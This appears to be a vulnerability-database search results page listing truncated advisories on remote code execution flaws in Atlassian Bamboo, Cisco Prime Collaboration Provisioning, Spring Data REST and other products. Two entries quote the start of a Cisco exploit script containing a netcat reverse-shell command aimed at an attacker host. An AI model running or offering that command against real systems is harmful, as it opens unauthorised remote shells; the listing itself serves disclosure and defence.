Lucene search

665 matches found

Prion
added 2017/12/13 3:29 p.m., 10 views

Design/Logic Flaw

It was possible for double OGNL evaluation in FreeMarker templates through Struts FreeMarker tags to occur. An attacker who has restricted administration rights to Bamboo or who hosts a website that a Bamboo administrator visits, is able to exploit this vulnerability to execute Java code of their...

CVSS 6.8, AI score 9.3, EPSS 0.00347
Exploits: 1, References: 3, Affected Software: 1

CVE
added 2017/12/13 3:0 p.m., 55 views

CVE-2017-14589

CVE-2017-14589: Atlassian Bamboo is affected by a remote code execution issue caused by double OGNL evaluation in FreeMarker templates via Struts FreeMarker tags. Affected versions are Bamboo < 6.1.6 and 6.2.0 ≤ Bamboo

CVSS 9.6, AI score 9.3, EPSS 0.00347
Exploits: 1, References: 3, Affected Software: 1

Cvelist
added 2017/12/13 3:0 p.m., 16 views

CVE-2017-14589

It was possible for double OGNL evaluation in FreeMarker templates through Struts FreeMarker tags to occur. An attacker who has restricted administration rights to Bamboo or who hosts a website that a Bamboo administrator visits, is able to exploit this vulnerability to execute Java code of their...

AI score 9.4, EPSS 0.00347
Exploits: 1, References: 3

0day.today
added 2017/10/27 12:0 a.m., 48 views

Bamboo 6.x Remote Code Execution Vulnerability

Bamboo versions prior to 6.0.5, 6.1.4, and 6.2.1 suffer from a code execution vulnerability. Bamboo 6.x Remote Code Execution CVE ID: CVE-2017-9514. Product: Bamboo. Affected Bamboo product versions: 6.0.0 = 6.0.0 but less than 6.0.5 the fixed version for 6.0.x or who have downloaded and installe...

CVSS 6.5, AI score 8.9, EPSS 0.00448
Exploits: 1

Saint
added 2017/10/25 12:0 a.m., 544 views

Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability

Added: 10/25/2017. CVE: CVE-2017-6622. BID: 98520. Background: The Cisco Prime Collaboration product family facilitates installation and maintenance of Cisco Unified Communications and Cisco TelePresence components, as well as the provisioning of users and services. Problem: Missing security constrain...

CVSS 10, AI score 9.6, EPSS 0.30954
Exploits: 5

Saint
added 2017/10/25 12:0 a.m., 541 views

Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability

Added: 10/25/2017. CVE: CVE-2017-6622. BID: 98520. Background: The Cisco Prime Collaboration product family facilitates installation and maintenance of Cisco Unified Communications and Cisco TelePresence components, as well as the provisioning of users and services. Problem: Missing security constrain...

CVSS 10, AI score 9.6, EPSS 0.30954
Exploits: 5

Saint
added 2017/10/25 12:0 a.m., 63 views

Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability

Added: 10/25/2017. CVE: CVE-2017-6622. BID: 98520. Background: The Cisco Prime Collaboration product family facilitates installation and maintenance of Cisco Unified Communications and Cisco TelePresence components, as well as the provisioning of users and services. Problem: Missing security constrain...

CVSS 10, AI score 9.6, EPSS 0.30954
Exploits: 5

CNVD
added 2017/10/16 12:0 a.m., 2 views

Atlassian Bamboo REST Endpoint Remote Code Execution Vulnerability

Atlassian Bamboo is a suite of continuous integration build tools from Atlassian Australia. The tool helps development teams build, test, release and deploy projects using continuous delivery capabilities. REST endpoint is one of the REST endpoints. A security vulnerability exists in the REST...

CVSS 8.8, AI score 8.8, EPSS 0.00311
Exploits: 1, References: 1

Prion
added 2017/10/12 1:29 p.m., 8 views

Code injection

Bamboo before 6.0.5, 6.1.x before 6.1.4, and 6.2.x before 6.2.1 had a REST endpoint that parsed a YAML file and did not sufficiently restrict which classes could be loaded. An attacker who can log in to Bamboo as a user is able to exploit this vulnerability to execute Java code of their choice on...

CVSS 6.5, AI score 7.3, EPSS 0.00311
Exploits: 1, References: 2, Affected Software: 1

CVE
added 2017/10/12 1:0 p.m., 43 views

CVE-2017-9514

CVE-2017-9514 affects Atlassian Bamboo. A REST endpoint could parse YAML and did not adequately restrict loaded classes, enabling an authenticated user to execute Java code on vulnerable Bamboo versions. Affected ranges: 6.0.x before 6.0.5, 6.1.x before 6.1.4, and 6.2.x before 6.2.1. Remediation ...

CVSS 8.8, AI score 8.7, EPSS 0.00311
Exploits: 1, References: 2, Affected Software: 1

Cvelist
added 2017/10/12 1:0 p.m., 15 views

CVE-2017-9514

Bamboo before 6.0.5, 6.1.x before 6.1.4, and 6.2.x before 6.2.1 had a REST endpoint that parsed a YAML file and did not sufficiently restrict which classes could be loaded. An attacker who can log in to Bamboo as a user is able to exploit this vulnerability to execute Java code of their choice on...

AI score 8.8, EPSS 0.00311
Exploits: 1, References: 2

OpenVAS
added 2017/10/11 12:0 a.m., 26 views

Atlassian Bamboo Remote Code Execution

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.

CVSS 8.8, AI score 9.1, EPSS 0.02273
Exploits: 0, References: 2

NVD
added 2017/10/03 1:29 a.m., 11 views

CVE-2015-6576

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource...

CVSS 8.8, AI score 9.1, EPSS 0.02273
Exploits: 0, References: 4

Prion
added 2017/10/03 1:29 a.m., 11 views

Code injection

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource...

CVSS 6.5, AI score 8, EPSS 0.02273
Exploits: 0, References: 4, Affected Software: 1

Cvelist
added 2017/10/02 6:0 p.m., 19 views

CVE-2015-6576

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource...

AI score 9.1, EPSS 0.02273
Exploits: 0, References: 4

exploitpack
added 2017/09/27 12:0 a.m., 25 views

Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution

Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "...

AI score 1
Exploits: 0

Exploit DB
added 2017/09/27 12:0 a.m., 42 views

Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

AI score 7.4
Exploits: 0

CNVD
added 2017/09/22 12:0 a.m., 6 views

Pivotal Spring Data REST Remote Code Execution Vulnerability

Spring Data REST is part of the Spring Data project and enables building hypermedia-driven REST web services on top of the Spring Data repository. A remote code execution vulnerability exists in Pivotal Spring Data REST, which allows an attacker to perform a remote code execution attack by...

CVSS 9.8, AI score 9.6, EPSS 0.93978
Exploits: 6, References: 1

CNVD
added 2017/07/28 12:0 a.m., 3 views

Apache Roller Execute Arbitrary Java Code Vulnerability

Apache Roller is a feature-rich multi-user blogging platform from the Apache Software Foundation in the United States. A security vulnerability exists in the weblog page template in Apache Roller versions 5.1 through 5.1.1. The vulnerability can be exploited by a remote attacker to execute...

CVSS 7.2, AI score 7.7, EPSS 0.00398
Exploits: 0, References: 1

Tenable Nessus
added 2017/07/28 12:0 a.m., 42 views

EMC VMAX VASA Provider Virtual Appliance File Upload RCE

The EMC VMAX VASA Provider Virtual Appliance running on the remote host is affected by a remote code execution vulnerability in the UploadConfigurator servlet due to a failure to restrict file uploads to arbitrary directories. An unauthenticated, remote attacker can exploit this issue to upload...

CVSS 10, AI score 9.3, EPSS 0.03913
Exploits: 1, References: 3